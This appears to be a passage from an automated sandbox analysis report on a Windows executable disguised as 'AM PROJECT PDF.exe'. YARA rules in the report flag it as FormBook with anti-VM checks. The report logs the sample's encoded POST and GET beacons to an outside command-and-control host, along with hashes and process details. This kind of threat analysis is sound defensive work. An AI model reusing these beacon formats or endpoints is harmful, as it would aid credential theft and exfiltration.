6c 6c 79 68 75 62 2e 63 6f 6d 2f 74 68 65 6d 65 2f 74 61 69 6c 77 69 6e 64 30 2e 33 2f 6a 73 2f 73 77 69 70 65 72 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 32 32 30 36 32 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 65 6c 6c 79 68 75 62 2e 63 6f 6d 2f 74 68 65 6d 65 2f 74 61 69 6c 77 69 6e 64 30 2e 33 2f 63 73 73 2f 62 61 6c 6c 6f 6f 6e 2e 63 73 73 3f 76 65 72 3d 32 32 30 36 32 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c Data Ascii: 4000<!doctype html><html lang="ko"><head><meta charset="utf-8"><meta http-equiv="imagetoolbar" content="no"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=0,maximum-scale=10,user-scalable=yes"><title>FellyHub</title><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><link rel="stylesheet" href="http://www.fellyhub.com/theme/tailwind0.3/js/swiper.min.css?ver=220620"><link rel="stylesheet" href="http://www.fellyhub.com/theme/tailwind0.3/css/balloon.css?ver=220620"><link rel

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49724	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:01:59.064711094 CEST	7583	OUT	POST /rdny/ HTTP/1.1 Host: www.soraligne.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.soraligne.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.soraligne.com/rdny/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 58 74 58 76 47 59 6d 58 4f 4c 4b 34 50 70 68 70 54 65 41 71 56 4b 46 4b 56 44 78 55 64 5a 77 41 6d 7e 7a 68 57 57 71 77 37 79 4d 52 4c 65 76 62 74 53 66 38 4a 37 46 7a 36 46 5f 38 31 51 38 55 4b 64 42 39 32 73 52 54 6f 31 74 61 59 6d 36 36 65 37 56 77 41 6b 55 58 75 32 6c 76 41 69 53 51 6f 6b 4c 50 42 35 55 5a 67 6e 6c 35 34 70 37 58 36 51 58 4d 63 35 6f 51 33 65 4e 39 45 4e 4f 71 38 69 65 49 44 46 30 6a 35 32 31 4c 63 52 64 6a 38 77 6a 56 56 51 37 30 56 53 76 66 4f 59 5f 4d 65 55 34 31 34 65 42 7e 4e 68 77 6b 42 68 73 46 77 7e 38 4d 36 6d 42 61 61 6b 51 4c 47 33 57 55 68 65 4b 69 4c 70 77 42 4c 78 4d 49 6a 44 6d 79 46 4f 30 79 31 38 47 74 32 58 4a 77 31 66 67 4c 6b 6e 74 61 4c 67 41 41 4c 68 44 63 59 74 4f 61 61 65 57 51 6c 45 71 6a 61 31 53 79 31 52 31 74 6b 54 51 36 53 4c 61 58 71 53 38 38 65 4b 31 73 6b 71 6d 7e 59 4f 4d 74 42 56 66 33 47 47 47 4f 6f 38 57 59 6b 70 61 28 6a 59 72 39 57 4f 79 38 44 39 34 79 48 76 6c 50 58 39 66 34 51 37 75 48 5a 6e 59 65 4a 71 5f 78 6f 59 6e 74 6d 6c 52 35 48 79 61 36 77 46 36 76 79 75 58 34 6c 35 51 48 54 4d 65 30 44 6e 72 57 5f 54 47 6e 30 79 38 44 31 5a 6c 39 76 69 4d 69 43 49 6e 39 55 33 4c 4e 73 54 7a 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNXtXvGYmXOLK4PphpTeAqVKFKVDxUdZwAm~zhWWqw7yMRLevbtSf8J7Fz6F_81Q8UKdB92sRTo1taYm66e7VwAkUXu2lvAiSQokLPB5UZgnl54p7X6QXMc5oQ3eN9ENOq8ieIDF0j521LcRdj8wjVVQ70VSvfOY_MeU414eB~NhwkBhsFw~8M6mBaakQLG3WUheKiLpwBLxMIjDmyFO0y18Gt2XJw1fgLkntaLgAALhDcYtOaaeWQlEqja1Sy1R1tkTQ6SLaXqS88eK1skqm~YOMtBVf3GGGOo8WYkpa(jYr9WOy8D94yHvlPX9f4Q7uHZnYeJq_xoYntmlR5Hya6wF6vyuX4l5QHTMe0DnrW_TGn0y8D1Zl9viMiCIn9U3LNsTzmQ).
Sep 23, 2022 08:01:59.180953979 CEST	7583	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Fri, 23 Sep 2022 06:01:59 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_hVBC8QMmhhTj76WWsT4XA33tF/tuHY4v1sPrHgf5uhmt5AAI8C661fq/AImxymQKOa2/3Gs3oho36leV2lOwMg Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49725	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:02:01.110363007 CEST	7584	OUT	POST /rdny/ HTTP/1.1 Host: www.soraligne.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.soraligne.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.soraligne.com/rdny/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4e 67 78 58 73 31 41 6d 44 2d 4c 4b 78 76 70 6a 70 54 65 62 71 56 4b 42 4b 51 75 36 55 50 35 77 44 30 57 7a 69 6b 75 71 78 37 79 4e 5a 72 65 6a 57 4e 54 4c 38 4a 36 71 7a 5f 6c 5f 38 31 30 38 55 4c 42 42 39 48 73 51 53 6f 31 76 4a 59 6e 73 77 2d 37 4d 77 41 35 44 58 71 7e 6c 76 44 4b 53 51 5a 6b 4c 50 7a 52 56 63 41 6e 6b 32 59 70 67 65 61 52 57 4d 63 35 47 51 33 66 6f 39 48 31 4f 71 49 47 65 4a 6c 52 37 36 70 32 74 4b 63 51 69 6c 50 74 4d 65 6c 73 4d 28 54 6a 65 55 59 6c 64 5a 63 5a 77 70 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: A0G=qgDxr4VVeFbjNgxXs1AmD-LKxvpjpTebqVKBKQu6UP5wD0Wzikuqx7yNZrejWNTL8J6qz_l_8108ULBB9HsQSo1vJYnsw-7MwA5DXq~lvDKSQZkLPzRVcAnk2YpgeaRWMc5GQ3fo9H1OqIGeJlR76p2tKcQilPtMelsM(TjeUYldZcZwpA).
Sep 23, 2022 08:02:01.226728916 CEST	7585	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Fri, 23 Sep 2022 06:02:01 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_hVBC8QMmhhTj76WWsT4XA33tF/tuHY4v1sPrHgf5uhmt5AAI8C661fq/AImxymQKOa2/3Gs3oho36leV2lOwMg Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49726	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:02:03.156976938 CEST	7591	OUT	POST /rdny/ HTTP/1.1 Host: www.soraligne.com Connection: close Content-Length: 5333 Cache-Control: no-cache Origin: http://www.soraligne.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.soraligne.com/rdny/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 41 30 47 3d 71 67 44 78 72 34 56 56 65 46 62 6a 4d 41 42 58 67 32 59 6d 58 75 4c 4e 39 50 70 6a 6a 7a 65 66 71 56 57 42 4b 56 44 78 55 63 56 77 41 6c 47 7a 68 47 57 71 7a 37 79 4e 62 72 65 76 62 74 53 65 38 4a 75 41 7a 36 42 42 38 33 34 38 56 61 39 42 30 48 73 52 51 49 31 73 49 6f 6d 36 30 2d 37 4d 77 41 31 70 58 76 4b 62 76 43 69 53 51 71 73 4c 50 78 35 55 63 51 6e 6c 70 6f 70 67 65 61 63 57 4d 63 35 38 51 7a 79 33 39 48 56 4f 6c 35 32 65 50 30 52 30 39 35 32 33 4c 63 52 58 75 63 38 43 56 56 73 30 30 51 37 69 66 4e 38 5f 4d 2d 55 34 32 37 32 42 77 74 68 78 35 78 68 78 46 77 6a 6e 4d 36 75 42 61 62 67 6d 4c 31 6e 57 56 42 4f 4b 72 4e 56 33 61 4c 78 4f 48 44 44 31 34 6c 7a 76 79 31 73 43 74 33 66 4a 77 45 72 67 49 7a 37 74 63 70 34 41 64 62 68 50 63 59 74 56 45 71 44 30 51 68 6b 55 6a 59 39 53 79 47 56 31 71 32 4c 51 28 44 4c 61 56 71 53 78 37 65 4b 73 73 6b 71 55 7e 59 4b 4d 74 42 67 71 33 46 69 47 4e 35 73 57 49 6b 70 62 72 54 59 73 6d 57 50 71 34 44 39 73 79 48 62 66 50 57 4e 50 37 67 28 75 47 65 37 59 64 59 71 5f 75 6f 59 69 6f 6d 6c 63 35 48 7e 31 36 78 70 55 76 33 43 58 34 31 52 51 48 51 55 65 7a 51 50 72 66 66 54 48 74 55 7a 76 4d 51 39 71 70 73 57 67 6c 78 55 61 7e 44 79 61 4f 59 4b 76 79 76 79 79 67 36 63 41 43 2d 58 78 52 5a 32 58 6c 51 61 39 7a 35 59 6d 6e 6c 4d 71 77 42 73 50 34 56 37 4e 6b 5f 57 64 73 65 6c 2d 77 5a 71 64 6b 4e 6a 52 6c 34 6f 4a 6d 31 52 34 28 55 55 51 42 58 43 46 39 61 71 65 69 56 43 32 6a 4b 39 64 42 36 4b 2d 44 63 38 6d 72 41 30 53 31 49 71 4e 30 74 43 38 35 52 4d 4f 78 43 6c 71 33 31 37 48 6d 70 39 4b 55 5f 4f 75 42 6f 76 76 6d 48 32 30 6a 6b 58 43 64 4f 4a 73 77 71 59 73 48 73 63 72 36 33 36 39 55 55 73 42 51 6a 56 35 7a 65 58 6b 4d 52 30 37 6c 4c 64 64 6d 47 28 4a 72 74 5a 57 51 31 5a 4f 4c 75 4a 47 50 6b 6a 69 31 53 34 74 55 69 59 72 6c 54 76 57 49 4a 6f 51 36 6b 4f 47 42 76 67 30 54 49 49 53 78 30 71 4d 76 6f 52 42 72 7a 4a 53 68 78 69 48 77 51 7e 57 35 30 6b 6a 42 64 6f 73 43 56 65 63 69 52 30 7a 37 69 48 71 31 51 69 65 4d 74 52 41 30 37 45 72 56 73 53 68 37 35 57 68 32 36 49 47 70 48 28 53 37 53 45 33 56 30 69 65 6e 66 6c 50 4c 56 6b 70 54 6e 39 59 51 50 31 59 66 52 62 4f 47 53 57 48 51 52 56 4b 51 62 49 6d 63 6e 75 30 63 69 4b 38 68 47 34 66 57 6c 44 55 6e 42 64 34 74 59 72 34 57 7a 43 78 5a 72 56 71 6f 4d 51 4d 48 5a 42 76 54 46 55 6a 4d 4c 75 48 36 6d 4a 6a 35 69 71 43 4e 36 54 30 65 44 69 47 36 58 7e 75 71 36 4e 56 52 4b 45 76 73 74 55 6c 38 5a 79 6f 74 56 78 5f 32 43 4e 34 79 62 35 4c 55 46 30 4c 44 52 78 6a 43 49 71 4d 58 32 38 33 51 35 48 57 6c 57 4c 48 32 75 46 4e 47 64 52 4f 4b 6b 47 58 48 50 75 6e 71 71 6e 6f 36 59 77 52 6c 53 63 6c 39 57 55 6d 73 5a 4f 45 78 71 33 47 49 6a 7e 30 6e 79 51 59 45 4a 53 42 34 30 31 72 39 68 55 48 67 34 6b 65 7a 33 59 48 79 45 45 57 34 70 68 4c 46 51 70 62 4e 45 37 6b 7a 75 35 46 38 76 6f 71 65 55 50 68 59 69 34 4a 41 4b 6b 70 55 75 79 72 4c 5a 54 41 4d 62 6f 45 48 56 4a 5f 31 38 49 66 4d 53 5a 73 32 52 43 76 76 68 32 5f 4a 32 52 4c 6a 73 50 61 79 30 36 37 4a 35 4b 4b 70 37 7e 61 65 41 4e 6e 7e 4f 52 36 55 39 33 43 66 76 6f 58 36 49 59 77 74 47 41 31 6f 51 4d 67 7e 48 78 35 72 46 30 5f 66 65 75 76 44 51 7a 35 6b 42 56 30 36 73 32 77 6c 34 4b 68 63 72 30 5a 73 75 56 74 4c 56 32 78 68 66 31 79 42 39 44 52 65 49 4f 4c 6d 37 31 70 77 4a 57 53 75 6f 73 43 72 4d 42 77 59 5f 46 4d 52 4f 73 4e 68 35 65 69 35 54 6c 6c 62 45 41 35 41 54 61 71 4f 6e 4e 30 74 49 7e 61 6d 37 71 6a 34 30 74 4e 66 42 41 6a 42 6c 63 33 58 30 62 5f 67 73 59 2d 76 57 6a 73 33 4e 59 76 33 43 65 68 79 30 7e 63 34 62 34 51 79 65 78 4a 46 54 67 5a 55 36 53 39 65 54 37 59 4b 51 6f 6f 66 43 48 38 78 76 55 58 32 4b 41 53 52 37 72 75 6d 34 4b 75 63 59 4e 69 32 54 57 63 56 5a 68 45 78 70 6d 64 43 63 66 2d 4c 42 41 45 69 63 6d 74 4e 34 30 31 7a 61 65 70 6e 33 45 58 76 34 50 7a 45 66 68 4c 6b 74 4d 4c 4d 67 69 73 35 57 41 4d 4c 63 50 6a 28 62 62 69 79 4a 66 78 49 76 66 6d 48 58 70 6a 43 4c 35 51 45 65 37 6f 4a 50 28 65 44 4b 39 74 67 69 35 57 38 65 58 76 51 42 5a 5a 49 74 43 37 56 54 71 77 34 66 7e 73 6c 44 59 32 69 44 32 2d 57 44 50 75 76 32 6a 63 78 6d 6d 44 63 47 57 64 48 38 43 Data Ascii: A0G=qgDxr4VVeFbjMABXg2YmXuLN9PpjjzefqVWBKVDxUcVwAlGzhGWqz7yNbrevbtSe8JuAz6BB8348Va9B0HsRQI1sIom60-7MwA1pXvKbvCiSQqsLPx5UcQnlpopgeacWMc58Qzy39HVOl52eP0R09523LcRXuc8CVVs00Q7ifN8_M-U4272Bwthx5xhxFwjnM6uBabgmL1nWVBOKrNV3aLxOHDD14lzvy1sCt3fJwErgIz7tcp4AdbhPcYtVEqD0QhkUjY9SyGV1q2LQ(DLaVqSx7eKsskqU~YKMtBgq3FiGN5sWIkpbrTYsmWPq4D9syHbfPWNP7g(uGe7YdYq_uoYiomlc5H~16xpUv3CX41RQHQUezQPrffTHtUzvMQ9qpsWglxUa~DyaOYKvyvyyg6cAC-XxRZ2XlQa9z5YmnlMqwBsP4V7Nk_Wdsel-wZqdkNjRl4oJm1R4(UUQBXCF9aqeiVC2jK9dB6K-Dc8mrA0S1IqN0tC85RMOxClq317Hmp9KU_OuBovvmH20jkXCdOJswqYsHscr6369UUsBQjV5zeXkMR07lLddmG(JrtZWQ1ZOLuJGPkji1S4tUiYrlTvWIJoQ6kOGBvg0TIISx0qMvoRBrzJShxiHwQ~W50kjBdosCVeciR0z7iHq1QieMtRA07ErVsSh75Wh26IGpH(S7SE3V0ienflPLVkpTn9YQP1YfRbOGSWHQRVKQbImcnu0ciK8hG4fWlDUnBd4tYr4WzCxZrVqoMQMHZBvTFUjMLuH6mJj5iqCN6T0eDiG6X~uq6NVRKEvstUl8ZyotVx_2CN4yb5LUF0LDRxjCIqMX283Q5HWlWLH2uFNGdROKkGXHPunqqno6YwRlScl9WUmsZOExq3GIj~0nyQYEJSB401r9hUHg4kez3YHyEEW4phLFQpbNE7kzu5F8voqeUPhYi4JAKkpUuyrLZTAMboEHVJ_18IfMSZs2RCvvh2_J2RLjsPay067J5KKp7~aeANn~OR6U93CfvoX6IYwtGA1oQMg~Hx5rF0_feuvDQz5kBV06s2wl4Khcr0ZsuVtLV2xhf1yB9DReIOLm71pwJWSuosCrMBwY_FMROsNh5ei5TllbEA5ATaqOnN0tI~am7qj40tNfBAjBlc3X0b_gsY-vWjs3NYv3Cehy0~c4b4QyexJFTgZU6S9eT7YKQoofCH8xvUX2KASR7rum4KucYNi2TWcVZhExpmdCcf-LBAEicmtN401zaepn3EXv4PzEfhLktMLMgis5WAMLcPj(bbiyJfxIvfmHXpjCL5QEe7oJP(eDK9tgi5W8eXvQBZZItC7VTqw4f~slDY2iD2-WDPuv2jcxmmDcGWdH8C-(zrPm-L4kid1yqI9N5fV5XhzCxftlLJ0cC4djWwZbsmy3JoF4csUtVneI0kh0FSx6niVW34jIeOw1UK1PdpFYL(o7mdLKlq5n8sjxIfZZvBhYfYPJFb3jeSWvIk3BISFH6ahgHF0CZj-IPmjIgdNc7Rk3hQZdAGyIAYttLq6ji3rhb0dCviZz6sfPV27zoFAfUJSp9IXyMuTHOjqh5CV1ot86rz4~SqfoTzPdpyKCvG-oU7wocX4P7uFXKZSJMPdgMY-YLdNnejoDY6Wq4wRfIKBLcGnbdLocuVuBqJozkaDTSImhVfJR_5lUOaCOgfwwuxjomYkBIP1Ghc5~7n1gHcxToDbqHhRDWD1hh1fJeGkuMdEOmUPBbPgn6Rw85clhm6OSqcYwoz1fja180pQi0g3s6Y5ESKYNGN1Hho1reR-AvfhwXvS~lvIQY3O2s3HMqA2wDhdgSzphjzx4COH9bBIQxckQGhy207MNpyd(0Y3IoyBIGjFlNUuCBbFNwjw6RfFTKhvLB~m(xYyXlNk75KMNvPlY0g-fy(IQsJFr948l-pOna2GlCMa6alLFpDMOnV_ns8mIjYmDs4fT6MgqsgNOPOIogCGXLVJvrmEuqqW8uosV36YYAQlCqMNX2y6I6NQQyNrEyFslW7rOGCofc8tGLRSx4(mV8EdRmlHXDCEEvhSCNMPV6zUpFrYOV~Hn1eiDwJnjYuOd7IaKXpjgU8sGCQHrEIc8AiqfWeHJpdDyK6fGkLdkUWNtRCQCBrFWHRjInUwzp2qpGvxPotau3FEdNaDTMeMk_tRaI8iiw1jVnRicfvMjXF9ZAfiS7KRtCsJRqa6D0Y8G76MjRlqRcZtckuetp2qjKWWU-IHqARGfn1Sst9UKavon_8VCwpq5elHwMKWTrpZG0ekGczOgCofI6TIrGqfCeMzQrrJSv95N71AfRJDlJj-DebnAR(cqtYK3xDHAVPPFAqaXgxmPXNbSJqgD3Bz~vs-ym~mVKWsWQHK~tkNNAOXUlJeRpqbCiZrmq4WaQTh~g3xjoEKdTbbI4o71I0uwqYht2weduuot1gTMnV8Lfd2etNjPc2cs4PvcPcZr3vHB0ysp0gJxYzkH99PtjzemkLCy5pjWQHjw0gswWmzZM8zCrtBUBdCbBGsgxiWIX43uaNya_sZ61vIvII3Zw~WyGgd7cpwuJCq8xffQYpOHWWB58XV4UChWiyue2FPPZ8wBqcYkK3AlUSHM0SRTMH26Z1_EXa7ikxPJM9fMlM-1IAuXbdwnPEKnCFgKAjI17cJM38EMfvHsmK-FBHXlASP7yhK09s5R41YvMK1GzJ-ntVo~I9UJ0scabOcNsc6hOCynm9j1Rmaai6XDAtAXyjKRVZh~-P_riHodXSQBHbiL4RahiMn3pK0PkOZ2jGaekWFbwjJO60OgOX7tJm_l0ZlrPf9uiVbdpCQB5dhm7d1lE5QBGG9izet1JIFdvTs1OpSx-xqmtvLABA-P-haUu(KFBgO5kw_4RJsYTdSIEUCyt7gRXLhsjGEvE8c90kVUw~qPN4wxQ7P42aac3Kjv3tgPpDyW6X5ei7UlbLWYNIziKVIxR9nC8YvjBAUkfaEr9P-S-EYQJC20jFOMYYJjuDkwDZEopMJ2FJSaNCShSPTTQ92mrROIs2maE2ZDkeJGPuC~u4aHaIALzkmiCraQyLZE9aBfDmgg28JihydQh2CfggLsRa6wTYjQu7Yfx0nScjopmDjjrieTPlJM6ezmpHT1WWT~n3arODhST2sB7Ipc8FG0m10SMkXJWpxNpWQCsyfC9CJsdpjlI6Fb8G3oZ8RUCmUtpSKFNmOdKNi7SYbfx~kHKndzHCroBOWMIDE5X6fwdomwzCg2VMPFFbRn3Y17RBBE3OnwUOgJ3xaYBMyUgZ_T3529e0B4f5-W4P25Pem3uDbou9z~gHg(ICfehciYgmtC5hi8swhn89a3SdbqUunzQ(cC3W4Q3J-3P6KIHBmje7J8iOCltDeLxp0DWZFY8v9jif8a2OKhYIKxfcdxylG3kGcpHaxl0OuebyaI2h4SoGFLTbAC5FvC64SWOdZLyIi(JoxRSP4LT466yBhBWrXM_o4l21Lkx~rLpWiu22Z5GJmRbb8mPqfKe4PCBuCFVpvm_XbZ-8pXOeuazglEo514HxEq3QxHbLgmU~1NcAgWgWAoDEtKuV5TdnDHJfmmEc9mZu72La4lxSAyYBNpiDQXMYrpxscrrUcoJ2UVEoY0yY41Sk_T9QFkJPn5YkN(mJA3VBhW5DK1WQBmLiujow9YvQ7fZr-FesglST2BOY-4pHwJeH5i4EzRjrS5-a3vdRgnqaCzSIhT57vpWH2JvRHN944XE~M6CspyYIVcejs8OVXC6bMjlZdtPPbOoVYHb5cnAhBvYGVuTNOh-ssO8qz7mB_1Jfk6GBj9Ju_vDWEp96rCAWQUOzwr1qdfTB5bxyERDoRJgGpnF84gf8ZDcWW2iJtiNkhVUQT04qIyxZUhNqfp6ZFIF6I~K5XGN1BW84D1pjD2yl2HPorHv5tNceftP~3z-hgSd(Iqt3e4Xaqy6Iu7HVLNBnTD3aU89d7reZRr-5osUy3DkFEOcuzuGfUpX8I0yMAem3ZzG3Cjgit2O9VKSNPzCZGP_bOCfnTba~BwsOVuaIQ6zRbsGCyq9Hq74J27HEv9Tp3CSsuEQLoVxDQE2Ch1nbsNKh1g1bKRr
Sep 23, 2022 08:02:03.339262009 CEST	7592	IN	HTTP/1.1 405 Not Allowed Server: openresty Date: Fri, 23 Sep 2022 06:02:03 GMT Content-Type: text/html Content-Length: 154 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_hVBC8QMmhhTj76WWsT4XA33tF/tuHY4v1sPrHgf5uhmt5AAI8C661fq/AImxymQKOa2/3Gs3oho36leV2lOwMg Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49727	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 23, 2022 08:02:05.205039024 CEST	7593	OUT	GET /rdny/?A0G=nirRoMghSnbgIhB91EMNSfP7/7ht0QeVg0GeLwyPWvopBgzqt2G+p533L6eaW6GeyJy3z9ND4nEybKooy0llY69rAo//5MT1xA==&7n-=6lYX HTTP/1.1 Host: www.soraligne.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 23, 2022 08:02:05.321933985 CEST	7593	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Fri, 23 Sep 2022 06:02:05 GMT Content-Type: text/html Content-Length: 291 ETag: "6324a85f-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Target ID:	0
Start time:	07:59:55
Start date:	23/09/2022
Path:	C:\Users\user\Desktop\AM PROJECT PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AM PROJECT PDF.exe"
Imagebase:	0xb0000
File size:	1038336 bytes
MD5 hash:	05069262CD099B2E37AFB5AFE629D12D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.302100662.0000000002505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: AM PROJECT PDF.exePID: 2104, Parent PID: 5088

General

Target ID:	6
Start time:	08:00:15
Start date:	23/09/2022
Path:	C:\Users\user\Desktop\AM PROJECT PDF.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\AM PROJECT PDF.exe
Imagebase:	0x6c0000
File size:	1038336 bytes
MD5 hash:	05069262CD099B2E37AFB5AFE629D12D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.423862001.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: 